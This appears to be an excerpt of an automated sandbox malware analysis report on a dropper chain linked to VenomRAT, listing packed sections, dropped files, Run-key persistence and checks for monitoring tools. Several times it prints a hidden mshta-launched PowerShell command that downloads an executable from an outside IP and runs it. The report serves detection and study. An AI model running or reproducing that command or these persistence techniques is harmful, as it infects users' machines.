Source: skotes.exe.11.dr	Static PE information: real checksum: 0x20a428 should be: 0x20a84b
Source: 376bb929a5.exe.18.dr	Static PE information: real checksum: 0x1eb8cb should be: 0x1eb8a1
Source: random[2].exe0.18.dr	Static PE information: real checksum: 0x1c2177 should be: 0x1c2a6c
Source: random[3].exe0.18.dr	Static PE information: real checksum: 0x0 should be: 0x611ecf
Source: TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE.35.dr	Static PE information: real checksum: 0x20a428 should be: 0x20a84b
Source: random[1].exe.18.dr	Static PE information: real checksum: 0x5d3606 should be: 0x5dd28b
Source: 48a23b3144.exe.18.dr	Static PE information: real checksum: 0x0 should be: 0x611ecf
Source: 680165SXWLIPNFUG.exe.24.dr	Static PE information: real checksum: 0x1c2177 should be: 0x1c2a6c
Source: random[2].exe.18.dr	Static PE information: real checksum: 0x1eb8cb should be: 0x1eb8a1
Source: GEMLK2N3PIGIX28D6T21H.exe.24.dr	Static PE information: real checksum: 0x20a428 should be: 0x20a84b
Source: 0a633717d1.exe.18.dr	Static PE information: real checksum: 0x1d2332 should be: 0x1d2039
Source: TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE.6.dr	Static PE information: real checksum: 0x20a428 should be: 0x20a84b
Source: random[3].exe.18.dr	Static PE information: real checksum: 0x0 should be: 0xbb8c2
Source: random[1].exe0.18.dr	Static PE information: real checksum: 0x1b446d should be: 0x1ba18e
Source: random[1].exe1.18.dr	Static PE information: real checksum: 0x1d2332 should be: 0x1d2039
Source: b7668220f8.exe.18.dr	Static PE information: real checksum: 0x5d3606 should be: 0x5dd28b
Source: 327981c77b.exe.18.dr	Static PE information: real checksum: 0x1c2177 should be: 0x1c2a6c

Source: TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE.6.dr	Static PE information: section name:
Source: TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE.6.dr	Static PE information: section name: .idata
Source: TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE.6.dr	Static PE information: section name:
Source: TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE.6.dr	Static PE information: section name: rkvlnuwm
Source: TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE.6.dr	Static PE information: section name: pjfgcgrb
Source: TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE.6.dr	Static PE information: section name: .taggant
Source: skotes.exe.11.dr	Static PE information: section name:
Source: skotes.exe.11.dr	Static PE information: section name: .idata
Source: skotes.exe.11.dr	Static PE information: section name:
Source: skotes.exe.11.dr	Static PE information: section name: rkvlnuwm
Source: skotes.exe.11.dr	Static PE information: section name: pjfgcgrb
Source: skotes.exe.11.dr	Static PE information: section name: .taggant
Source: random[1].exe.18.dr	Static PE information: section name:
Source: random[1].exe.18.dr	Static PE information: section name: .idata
Source: random[1].exe.18.dr	Static PE information: section name:
Source: random[1].exe.18.dr	Static PE information: section name: tdgddxmh
Source: random[1].exe.18.dr	Static PE information: section name: glxcziaw
Source: random[1].exe.18.dr	Static PE information: section name: .taggant
Source: b7668220f8.exe.18.dr	Static PE information: section name:
Source: b7668220f8.exe.18.dr	Static PE information: section name: .idata
Source: b7668220f8.exe.18.dr	Static PE information: section name:
Source: b7668220f8.exe.18.dr	Static PE information: section name: tdgddxmh
Source: b7668220f8.exe.18.dr	Static PE information: section name: glxcziaw
Source: b7668220f8.exe.18.dr	Static PE information: section name: .taggant
Source: random[1].exe0.18.dr	Static PE information: section name:
Source: random[1].exe0.18.dr	Static PE information: section name: .idata
Source: random[1].exe0.18.dr	Static PE information: section name:
Source: random[1].exe0.18.dr	Static PE information: section name: sfyuxlav
Source: random[1].exe0.18.dr	Static PE information: section name: uolmlutr
Source: random[1].exe0.18.dr	Static PE information: section name: .taggant
Source: 6d81c0d08d.exe.18.dr	Static PE information: section name:
Source: 6d81c0d08d.exe.18.dr	Static PE information: section name: .idata
Source: 6d81c0d08d.exe.18.dr	Static PE information: section name:
Source: 6d81c0d08d.exe.18.dr	Static PE information: section name: sfyuxlav
Source: 6d81c0d08d.exe.18.dr	Static PE information: section name: uolmlutr
Source: 6d81c0d08d.exe.18.dr	Static PE information: section name: .taggant
Source: random[1].exe1.18.dr	Static PE information: section name:
Source: random[1].exe1.18.dr	Static PE information: section name: .idata
Source: random[1].exe1.18.dr	Static PE information: section name:
Source: random[1].exe1.18.dr	Static PE information: section name: ntmjlkyf
Source: random[1].exe1.18.dr	Static PE information: section name: izkkdycv
Source: random[1].exe1.18.dr	Static PE information: section name: .taggant
Source: 0a633717d1.exe.18.dr	Static PE information: section name:
Source: 0a633717d1.exe.18.dr	Static PE information: section name: .idata
Source: 0a633717d1.exe.18.dr	Static PE information: section name:
Source: 0a633717d1.exe.18.dr	Static PE information: section name: ntmjlkyf
Source: 0a633717d1.exe.18.dr	Static PE information: section name: izkkdycv
Source: 0a633717d1.exe.18.dr	Static PE information: section name: .taggant
Source: random[2].exe.18.dr	Static PE information: section name:
Source: random[2].exe.18.dr	Static PE information: section name: .idata
Source: random[2].exe.18.dr	Static PE information: section name:
Source: random[2].exe.18.dr	Static PE information: section name: cjilwkrm
Source: random[2].exe.18.dr	Static PE information: section name: qqatcnkp
Source: random[2].exe.18.dr	Static PE information: section name: .taggant
Source: 376bb929a5.exe.18.dr	Static PE information: section name:
Source: 376bb929a5.exe.18.dr	Static PE information: section name: .idata
Source: 376bb929a5.exe.18.dr	Static PE information: section name:
Source: 376bb929a5.exe.18.dr	Static PE information: section name: cjilwkrm
Source: 376bb929a5.exe.18.dr	Static PE information: section name: qqatcnkp
Source: 376bb929a5.exe.18.dr	Static PE information: section name: .taggant
Source: random[2].exe0.18.dr	Static PE information: section name:
Source: random[2].exe0.18.dr	Static PE information: section name: .idata
Source: random[2].exe0.18.dr	Static PE information: section name:
Source: random[2].exe0.18.dr	Static PE information: section name: bchkvmmi
Source: random[2].exe0.18.dr	Static PE information: section name: wdfozfjw
Source: random[2].exe0.18.dr	Static PE information: section name: .taggant
Source: 327981c77b.exe.18.dr	Static PE information: section name:
Source: 327981c77b.exe.18.dr	Static PE information: section name: .idata
Source: 327981c77b.exe.18.dr	Static PE information: section name:
Source: 327981c77b.exe.18.dr	Static PE information: section name: bchkvmmi
Source: 327981c77b.exe.18.dr	Static PE information: section name: wdfozfjw
Source: 327981c77b.exe.18.dr	Static PE information: section name: .taggant
Source: 680165SXWLIPNFUG.exe.24.dr	Static PE information: section name:
Source: 680165SXWLIPNFUG.exe.24.dr	Static PE information: section name: .idata
Source: 680165SXWLIPNFUG.exe.24.dr	Static PE information: section name:
Source: 680165SXWLIPNFUG.exe.24.dr	Static PE information: section name: bchkvmmi
Source: 680165SXWLIPNFUG.exe.24.dr	Static PE information: section name: wdfozfjw
Source: 680165SXWLIPNFUG.exe.24.dr	Static PE information: section name: .taggant
Source: GEMLK2N3PIGIX28D6T21H.exe.24.dr	Static PE information: section name:
Source: GEMLK2N3PIGIX28D6T21H.exe.24.dr	Static PE information: section name: .idata
Source: GEMLK2N3PIGIX28D6T21H.exe.24.dr	Static PE information: section name:
Source: GEMLK2N3PIGIX28D6T21H.exe.24.dr	Static PE information: section name: rkvlnuwm
Source: GEMLK2N3PIGIX28D6T21H.exe.24.dr	Static PE information: section name: pjfgcgrb
Source: GEMLK2N3PIGIX28D6T21H.exe.24.dr	Static PE information: section name: .taggant
Source: TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE.35.dr	Static PE information: section name:
Source: TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE.35.dr	Static PE information: section name: .idata
Source: TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE.35.dr	Static PE information: section name:
Source: TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE.35.dr	Static PE information: section name: rkvlnuwm
Source: TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE.35.dr	Static PE information: section name: pjfgcgrb
Source: TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE.35.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CF22CB push ds; iretd	0_2_00CF22E2
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00CF0A76 push ecx; ret	0_2_00CF0A89
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Code function: 21_2_0554A850 push es; ret	21_2_0554A895
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Code function: 21_2_05544D00 push es; ret	21_2_05544D15
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Code function: 21_2_05544CC0 push es; ret	21_2_05544CD5
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Code function: 21_2_05544CE0 push es; ret	21_2_05544D15
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Code function: 21_2_05544C9F push es; ret	21_2_05544CB5
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Code function: 23_3_00BAD296 push ss; ret	23_3_00BAD2A2
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Code function: 23_3_00BAD296 push ss; ret	23_3_00BAD2A2
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Code function: 23_3_00BAD296 push ss; ret	23_3_00BAD2A2
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Code function: 23_3_00BAD296 push ss; ret	23_3_00BAD2A2
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Code function: 23_3_00BAD296 push ss; ret	23_3_00BAD2A2
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Code function: 23_3_00BAD296 push ss; ret	23_3_00BAD2A2
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Code function: 23_3_00BAD296 push ss; ret	23_3_00BAD2A2
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Code function: 23_3_00BAD296 push ss; ret	23_3_00BAD2A2
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Code function: 23_3_00BAD296 push ss; ret	23_3_00BAD2A2
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Code function: 23_3_00BAD296 push ss; ret	23_3_00BAD2A2
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Code function: 23_3_00BAD296 push ss; ret	23_3_00BAD2A2
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Code function: 23_3_00BAD296 push ss; ret	23_3_00BAD2A2
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Code function: 23_3_00BAD296 push ss; ret	23_3_00BAD2A2
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Code function: 23_3_00BAD296 push ss; ret	23_3_00BAD2A2
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Code function: 23_3_00BAD296 push ss; ret	23_3_00BAD2A2
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Code function: 23_3_00BAD296 push ss; ret	23_3_00BAD2A2

Source: TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE.6.dr	Static PE information: section name: entropy: 7.063527251784684
Source: TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE.6.dr	Static PE information: section name: rkvlnuwm entropy: 7.9530875490689885
Source: skotes.exe.11.dr	Static PE information: section name: entropy: 7.063527251784684
Source: skotes.exe.11.dr	Static PE information: section name: rkvlnuwm entropy: 7.9530875490689885
Source: random[1].exe.18.dr	Static PE information: section name: tdgddxmh entropy: 7.948536422184828
Source: b7668220f8.exe.18.dr	Static PE information: section name: tdgddxmh entropy: 7.948536422184828
Source: random[1].exe0.18.dr	Static PE information: section name: entropy: 7.969559919689927
Source: random[1].exe0.18.dr	Static PE information: section name: sfyuxlav entropy: 7.9539025765288685
Source: 6d81c0d08d.exe.18.dr	Static PE information: section name: entropy: 7.969559919689927
Source: 6d81c0d08d.exe.18.dr	Static PE information: section name: sfyuxlav entropy: 7.9539025765288685
Source: random[1].exe1.18.dr	Static PE information: section name: entropy: 7.981559373042576
Source: random[1].exe1.18.dr	Static PE information: section name: ntmjlkyf entropy: 7.952841037435362
Source: 0a633717d1.exe.18.dr	Static PE information: section name: entropy: 7.981559373042576
Source: 0a633717d1.exe.18.dr	Static PE information: section name: ntmjlkyf entropy: 7.952841037435362
Source: random[2].exe.18.dr	Static PE information: section name: entropy: 7.976924137983909
Source: random[2].exe.18.dr	Static PE information: section name: cjilwkrm entropy: 7.95415716000078
Source: 376bb929a5.exe.18.dr	Static PE information: section name: entropy: 7.976924137983909
Source: 376bb929a5.exe.18.dr	Static PE information: section name: cjilwkrm entropy: 7.95415716000078
Source: random[2].exe0.18.dr	Static PE information: section name: bchkvmmi entropy: 7.9539623243837285
Source: 327981c77b.exe.18.dr	Static PE information: section name: bchkvmmi entropy: 7.9539623243837285
Source: 680165SXWLIPNFUG.exe.24.dr	Static PE information: section name: bchkvmmi entropy: 7.9539623243837285
Source: GEMLK2N3PIGIX28D6T21H.exe.24.dr	Static PE information: section name: entropy: 7.063527251784684
Source: GEMLK2N3PIGIX28D6T21H.exe.24.dr	Static PE information: section name: rkvlnuwm entropy: 7.9530875490689885
Source: TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE.35.dr	Static PE information: section name: entropy: 7.063527251784684
Source: TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE.35.dr	Static PE information: section name: rkvlnuwm entropy: 7.9530875490689885

Source: random[3].exe.18.dr, PjMboxrZKVMRiayL4T.cs	High entropy of concatenated method names: 't2mTkbE8Cto8HmGlYV8', 'g4u1IrEawEsUZ67S7Wi', 'amqdtVWeNm', 'pA5ZBQEtT6loGltfEMA', 'GXxHyNEjrGXyH8tEQAB', 'eVsKxBEvbdJjNe0EZye', 'pqnThvEuBxnf8vqytJr', 'UUsUd7EA9gx3jM1UCGb', 's4C7e6ETm1C8hnG34B0', 'bmgy4SEkrKbXNPCdYnP'
Source: random[3].exe.18.dr, IAYNcYxlTFn1TcgV7Nc.cs	High entropy of concatenated method names: 'pxCx1VClxM', 'EqUxbGvDUa', 'YtEx6PpsFY', 'rlHxMgdHsd', 'OTtxe6u7RZ', 'E9gxQ9PVdu', 'u49x0BEP7D', 'kHbxFT0Aes', 'sv1xVTxidI', 'eeWxoNxt0u'
Source: 82ab3472d6.exe.18.dr, PjMboxrZKVMRiayL4T.cs	High entropy of concatenated method names: 't2mTkbE8Cto8HmGlYV8', 'g4u1IrEawEsUZ67S7Wi', 'amqdtVWeNm', 'pA5ZBQEtT6loGltfEMA', 'GXxHyNEjrGXyH8tEQAB', 'eVsKxBEvbdJjNe0EZye', 'pqnThvEuBxnf8vqytJr', 'UUsUd7EA9gx3jM1UCGb', 's4C7e6ETm1C8hnG34B0', 'bmgy4SEkrKbXNPCdYnP'
Source: 82ab3472d6.exe.18.dr, IAYNcYxlTFn1TcgV7Nc.cs	High entropy of concatenated method names: 'pxCx1VClxM', 'EqUxbGvDUa', 'YtEx6PpsFY', 'rlHxMgdHsd', 'OTtxe6u7RZ', 'E9gxQ9PVdu', 'u49x0BEP7D', 'kHbxFT0Aes', 'sv1xVTxidI', 'eeWxoNxt0u'
Source: random[3].exe0.18.dr, PjMboxrZKVMRiayL4T.cs	High entropy of concatenated method names: 't2mTkbE8Cto8HmGlYV8', 'g4u1IrEawEsUZ67S7Wi', 'amqdtVWeNm', 'pA5ZBQEtT6loGltfEMA', 'GXxHyNEjrGXyH8tEQAB', 'eVsKxBEvbdJjNe0EZye', 'pqnThvEuBxnf8vqytJr', 'UUsUd7EA9gx3jM1UCGb', 's4C7e6ETm1C8hnG34B0', 'bmgy4SEkrKbXNPCdYnP'
Source: random[3].exe0.18.dr, IAYNcYxlTFn1TcgV7Nc.cs	High entropy of concatenated method names: 'pxCx1VClxM', 'EqUxbGvDUa', 'YtEx6PpsFY', 'rlHxMgdHsd', 'OTtxe6u7RZ', 'E9gxQ9PVdu', 'u49x0BEP7D', 'kHbxFT0Aes', 'sv1xVTxidI', 'eeWxoNxt0u'
Source: 48a23b3144.exe.18.dr, PjMboxrZKVMRiayL4T.cs	High entropy of concatenated method names: 't2mTkbE8Cto8HmGlYV8', 'g4u1IrEawEsUZ67S7Wi', 'amqdtVWeNm', 'pA5ZBQEtT6loGltfEMA', 'GXxHyNEjrGXyH8tEQAB', 'eVsKxBEvbdJjNe0EZye', 'pqnThvEuBxnf8vqytJr', 'UUsUd7EA9gx3jM1UCGb', 's4C7e6ETm1C8hnG34B0', 'bmgy4SEkrKbXNPCdYnP'
Source: 48a23b3144.exe.18.dr, IAYNcYxlTFn1TcgV7Nc.cs	High entropy of concatenated method names: 'pxCx1VClxM', 'EqUxbGvDUa', 'YtEx6PpsFY', 'rlHxMgdHsd', 'OTtxe6u7RZ', 'E9gxQ9PVdu', 'u49x0BEP7D', 'kHbxFT0Aes', 'sv1xVTxidI', 'eeWxoNxt0u'

Persistence and Installation Behavior

Tries to download and execute files (via powershell)

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File created: C:\Users\user\AppData\Local\Temp\680165SXWLIPNFUG.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070078001\84b9c8b064.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	File created: C:\Users\user\AppData\Local\Temp\tmpC752.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File created: C:\Users\user\AppData\Local\Temp\GEMLK2N3PIGIX28D6T21H.exe	Jump to dropped file

Boot Survival

Yara detected VenomRAT

Source: Yara match	File source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1f8e467ee9.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 327981c77b.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 376bb929a5.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 84b9c8b064.exe

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
